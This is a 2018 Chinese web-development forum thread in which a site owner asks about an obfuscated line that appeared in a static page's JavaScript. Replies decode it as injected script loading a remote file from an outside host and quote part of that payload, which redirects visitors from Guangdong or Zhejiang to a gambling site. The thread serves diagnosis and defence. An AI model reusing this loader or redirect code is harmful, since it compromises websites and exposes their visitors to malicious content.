请问JS代码最后这段代码是什么意思,突然JS代码增加了这一串代码

mr老周 2018-06-08 08:00:25
window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,51,46,98,118,56,56,56,56,46,99,111,109,47,102,99,46,106,115);document.body.appendChild(window.s)


突然JS代码后面多了一串这样的代码
...全文
1134 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
hookee 2018-06-12
  • 打赏
  • 举报
回复
查一下服务器上的源文件,如果过源文件里有这段代码,那服务器可能不安全了,如果源文件里没有,浏览器里有,那可能当前用的网络不安全。
Logerlink 2018-06-11
  • 打赏
  • 举报
回复
看看是否能够删除咯,可以的话就直接将它删除了
ambit_tsai-微信 2018-06-08
  • 打赏
  • 举报
回复
引用 2 楼 weixin_42418751的回复:
这种应该怎么解决啊?网站没有后台,静态页面,怎么被拿掉权限的呢
指不定是你服务器被攻破了,查看下系统日志,看有没有异常IP什么的
mr老周 2018-06-08
  • 打赏
  • 举报
回复
引用 1 楼 ambit_tsai 的回复:
给你翻译一下

var s = document.createElement('script');
s.src = "http://123.bv8888.com/fc.js";
document.body.appendChild(s);
地域歧视,哈哈哈,这种是怎么被挂马呢?也没后台啊,
ambit_tsai-微信 2018-06-08
  • 打赏
  • 举报
回复
网页挂马,里面有段代码很有意思。

if (remote_ip_info.province == "广东" || remote_ip_info.province == "浙江" || remote_ip_info.province == "\u5e7f\u4e1c" ||remote_ip_info.province == "\u6d59\u6c5f" ){
window.location.href = 'http://www.5655822.com:8888/register?a=21';
}

当检测到广东或浙江的地址就跳转到赌博网站,广东人和浙江人都这么有钱的吗,这算歧视吗
FFF279469961 2018-06-08
  • 打赏
  • 举报
回复
window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));//window.s定义一个变量s,document.createElement(String.fromCharCode(115,99,114,105,112,116))创建了一个script标签 window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,51,46,98,118,56,56,56,56,46,99,111,109,47,102,99,46,106,115);标签引用http://123.bv8888.com/fc.js document.body.appendChild(window.s)在body中append 这个script标签
mr老周 2018-06-08
  • 打赏
  • 举报
回复
这种应该怎么解决啊?网站没有后台,静态页面,怎么被拿掉权限的呢
ambit_tsai-微信 2018-06-08
  • 打赏
  • 举报
回复
给你翻译一下

var s = document.createElement('script');
s.src = "http://123.bv8888.com/fc.js";
document.body.appendChild(s);

87,921

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧